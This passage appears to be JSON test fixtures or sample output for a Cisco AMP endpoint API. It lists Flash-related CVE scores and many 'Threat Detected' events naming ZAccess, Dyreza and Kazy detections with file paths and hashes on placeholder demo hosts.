://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0504"},{"cve":"CVE-2013-0638","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0638"},{"cve":"CVE-2013-0639","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0639"},{"cve":"CVE-2013-0642","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0642"},{"cve":"CVE-2013-0644","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0644"},{"cve":"CVE-2013-0645","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0645"},{"cve":"CVE-2013-0647","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0647"},{"cve":"CVE-2013-0649","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0649"},{"cve":"CVE-2013-1365","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1365"},{"cve":"CVE-2013-1366","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1366"},{"cve":"CVE-2013-1367","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1367"},{"cve":"CVE-2013-1368","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1368"},{"cve":"CVE-2013-1369","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1369"},{"cve":"CVE-2013-1370","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1370"},{"cve":"CVE-2013-1372","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1372"},{"cve":"CVE-2013-1373","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1373"},{"cve":"CVE-2013-1374","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1374"},{"cve":"CVE-2014-0507","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0507"},{"cve":"CVE-2013-5331","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5331"},{"cve":"CVE-2013-0648","score"
:9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0648"},{"cve":"CVE-2013-0643","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0643"},{"cve":"CVE-2013-0634","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0634"},{"cve":"CVE-2013-0633","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0633"},{"cve":"CVE-2014-0499","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0499"},{"cve":"CVE-2014-0503","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0503"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364536253907000,"timestamp":1610705149,"timestamp_nanoseconds":228000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Backdoor2:ZAccess-tpd","detection_id":"5832364536253906973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"80000000.@","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\U\\80000000.@","identity":{"sha256":"9a9de323dc2ba4059c3eb10d20e8b93a4cc44c93ac41a5dfc9572fa1c0d5b1a8","sha1":"f18d87d7c547ed6118b74b2208e592f67b7fca43","md5":"800381acbba0e7bff6cfd0cfd704bf09"},"parent":{"process_id":496,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"d7bc4ed605b32274b45328fd9914fb0e7b90d869a38f0e6f94fb1bf4e9e2b407","sha1":"54a90c371155985420f455361a5b3ac897e6c96e","md5":"5f1b6a9c35d3d5ca72d6d6fdef9747d6"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255953394991000,"timestamp":1610705129,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:05:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255953394991134","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364428879725000,"timestamp":1610705124,"timestamp_nanoseconds":271000000,"date":"2021-01-15T10:05:24+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364394519986204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":3924,"disposition":"Clean","file_name":"InstallFlashPlayer.exe","identity":{"sha256":"672ec8dceafd429c1a09cfafbc4951968953e2081e0d97243040db16edb24429","sha1":"5c921b125bac24670d2bf27659e100cdf24e7e7f","md5":"2ff9b590342c62748885d459d082295f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":628000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252765","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":612000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252764","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255919035252763","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":846000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215109","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":839000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215107","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":790000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215108","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab-temp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab-temp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jar_cache4855455380559478946.tmp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\jar_cache4855455380559478946.tmp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255906150351000,"timestamp":1610705118,"timestamp_nanoseconds":24000000,"date":"2021-01-15T10:05:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255906150350874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":715000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084315","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084314","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":677000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084313","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":501000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364373045149720","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1089625888-3054005746-3039903294-1000\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":4016,"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":441000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149719","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":149000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat 
